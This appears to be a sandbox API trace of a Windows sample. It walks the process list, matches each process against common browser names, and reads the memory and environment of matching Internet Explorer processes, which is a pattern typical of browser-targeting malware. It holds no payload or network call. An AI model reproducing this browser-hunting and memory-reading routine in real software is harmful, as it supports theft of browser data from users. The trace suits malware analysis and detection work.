	[0206.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.372] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0206.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.373] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.373] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x2f24
	[0206.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.374] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.375] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.375] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.375] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.375] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0206.376] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2f28
	[0206.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.376] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0206.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.377] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.379] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0206.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.380] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.380] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0206.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2f2c
	[0206.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.381] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0206.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.381] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.381] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0206.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.382] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.382] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0206.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2f30
	[0206.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.383] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0206.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.383] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.383] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0206.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.383] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.383] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0206.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x2f34
	[0206.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.384] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0206.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.385] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.385] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0206.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.385] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.385] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0206.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0206.386] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0206.387] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2f38
	[0206.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.387] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0206.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.387] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.388] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0206.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.389] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.389] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0206.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2f3c
	[0206.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.390] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0206.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.390] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.391] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0206.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.391] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.391] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0206.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2f40
	[0206.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.392] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0206.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.392] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.393] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0206.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.393] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.393] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0206.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x2f44
	[0206.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.394] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0206.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.395] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.395] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0206.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.395] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.395] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0206.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2f48
	[0206.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.396] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0206.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.397] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.397] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0206.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.398] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.398] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0206.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2f4c
	[0206.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.399] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0206.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.399] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.399] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0206.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.400] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.400] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0206.400] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2f50
	[0206.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.401] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0206.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.401] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.401] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0206.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.402] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.402] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0206.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x2f54
	[0206.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.403] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0206.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.404] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.404] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0206.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.405] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0206.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2f58
	[0206.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.406] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0206.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.406] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.406] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0206.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.406] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0206.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2f5c
	[0206.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.407] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0206.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.408] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.408] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0206.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.408] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.408] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0206.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x2f60
	[0206.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.409] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0206.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.410] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.410] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0206.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.410] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0206.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x2f64
	[0206.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.412] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0206.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.412] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.413] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0206.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.413] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.414] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0206.414] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x2f68
	[0206.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.414] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0206.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.415] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.415] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0206.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.416] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.416] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0206.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x2f6c
	[0206.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.417] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0206.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.418] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.418] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0206.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.419] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0206.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x2f70
	[0206.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.420] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0206.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.440] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.440] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0206.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.441] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.441] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x2f74
	[0206.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.442] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.442] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.442] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.443] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.443] NtQueryInformationProcess (in: ProcessHandle=0x2f74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.443] ReadProcessMemory (in: hProcess=0x2f74, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.443] ReadProcessMemory (in: hProcess=0x2f74, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.443] ReadProcessMemory (in: hProcess=0x2f74, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.443] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0206.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0206.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x2f78
	[0206.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.444] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0206.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.444] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0206.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.445] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0206.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.445] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.445] NtQueryInformationProcess (in: ProcessHandle=0x2f78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0206.445] ReadProcessMemory (in: hProcess=0x2f78, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0206.445] ReadProcessMemory (in: hProcess=0x2f78, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0206.445] ReadProcessMemory (in: hProcess=0x2f78, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0206.445] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
